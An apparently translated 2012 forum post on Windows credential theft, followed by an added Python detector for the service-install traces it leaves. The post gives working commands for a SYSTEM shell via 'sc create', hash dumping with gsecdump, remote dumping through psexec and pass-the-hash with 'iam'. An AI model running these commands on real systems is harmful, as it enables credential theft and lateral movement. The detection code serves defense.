Hash injection attack
Posted by the original poster on 2012-11-6 21:09:29

To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LM hashes that can be easily broken with Rainbow Tables.
A tip: you can use iam from the pshtools toolkit to import the hash information just grabbed with gsecdump into the local lsass process, to carry out a hash injection attack. The foreigners really are good at this; now the administrators have their work cut out for them. The LM/NT hashes obtained while ARP spoofing, or those obtained with gethash, actually don't need to have their passwords cracked at all; it is just a matter of using the tools. As the original article puts it well: whether the password is 4 characters or 127 characters long, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
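A detection-side example, added here and not part of the post above or of any of the tools it mentions. The SYSTEM-shell trick in the post leaves a clear trail in the System event log: a service-install event (7045) whose binary is cmd.exe, followed within seconds by start-failure events (7009 "timeout waiting for the service to connect" and 7000 "failed to start") because cmd.exe never reports to the Service Control Manager, and the `psexec -s` step installs PsExec's own service (PSEXESVC by default). The Python below parses constructed log lines in a simplified key=value layout (an assumption for the example, not Event Viewer's real export format) and flags those patterns; the timestamps and the Spooler entry are invented control data.

```python
"""Flag suspicious service installs in a constructed System-log-style export.

Added defender example (not the post's or any tool's own code). The line layout is a
simplified, constructed key=value format, not Event Viewer's real export syntax.
"""
import re
from datetime import datetime, timedelta

SHELL_BINARIES = {"cmd.exe", "command.com", "powershell.exe"}
REMOTE_EXEC_SERVICE = "psexesvc"            # default service name PsExec installs on the target
START_FAILURE_EVENTS = {"7000", "7009"}     # service failed to start / timeout waiting for it to connect

# Constructed sample, modelled on the session in the post above (timestamps are invented).
SAMPLE_LOG = r"""
2012-11-06 21:09:10 7045 ServiceName=shellcmdline ImagePath="C:\WINDOWS\system32\cmd.exe /K start" ServiceType="user mode service" StartType="demand start" Account=LocalSystem
2012-11-06 21:09:40 7009 ServiceName=shellcmdline Message="A timeout was reached (30000 milliseconds) while waiting for the shellcmdline service to connect."
2012-11-06 21:09:40 7000 ServiceName=shellcmdline Message="The shellcmdline service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion."
2012-11-06 21:15:40 7045 ServiceName=PSEXESVC ImagePath="%SystemRoot%\PSEXESVC.exe" ServiceType="user mode service" StartType="demand start" Account=LocalSystem
2012-11-06 22:00:00 7045 ServiceName=Spooler ImagePath="C:\WINDOWS\system32\spoolsv.exe" ServiceType="user mode service" StartType="auto start" Account=LocalSystem
"""

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')   # key="quoted value" or key=bareword


def parse_event(line):
    """Parse '<date> <time> <event id> key=value ...' into a dict."""
    date, time, event_id, rest = line.split(" ", 3)
    fields = {key: quoted or bare for key, quoted, bare in KV_RE.findall(rest)}
    fields["ts"] = datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S")
    fields["event_id"] = event_id
    return fields


def image_basename(image_path):
    """Executable name (lower-case) from a service command line, honouring a quoted path."""
    path = image_path.strip()
    exe = path[1:path.find('"', 1)] if path.startswith('"') else path.split(" ", 1)[0]
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(log_text, window=timedelta(seconds=60)):
    """Return findings for 7045 installs that look like SCM abuse rather than real services."""
    events = [parse_event(l) for l in log_text.splitlines() if l.strip()]
    installs = [e for e in events if e["event_id"] == "7045"]
    failures = [e for e in events if e["event_id"] in START_FAILURE_EVENTS]
    findings = []
    for ev in installs:
        name = ev.get("ServiceName", "")
        exe = image_basename(ev.get("ImagePath", ""))
        reasons = []
        if exe in SHELL_BINARIES:
            reasons.append(f"service binary is a command shell ({exe})")
        if name.lower() == REMOTE_EXEC_SERVICE or exe == REMOTE_EXEC_SERVICE + ".exe":
            reasons.append("PsExec remote-execution service installed")
        # A real service connects to the SCM; cmd.exe does not, so the install is
        # followed almost immediately by 7009/7000 for the same service name.
        failed_soon = any(
            f.get("ServiceName", "").lower() == name.lower()
            and ev["ts"] <= f["ts"] <= ev["ts"] + window
            for f in failures
        )
        if failed_soon:
            reasons.append("start failed right after install (binary never reported to the SCM)")
        if reasons:
            findings.append({"ts": ev["ts"], "service": name,
                             "image": ev.get("ImagePath", ""), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"{f['ts']:%Y-%m-%d %H:%M:%S} {f['service']}: " + "; ".join(f["reasons"]))
```

Run against the constructed sample, `analyse` flags `shellcmdline` on two grounds (shell binary, immediate start failure) and `PSEXESVC` on one, and leaves the Spooler install alone. In a real environment the same three signals come from the System log's 7045/7000/7009 events (or Security 4697 where service-install auditing is on); the key=value parsing is the only part that would need to change.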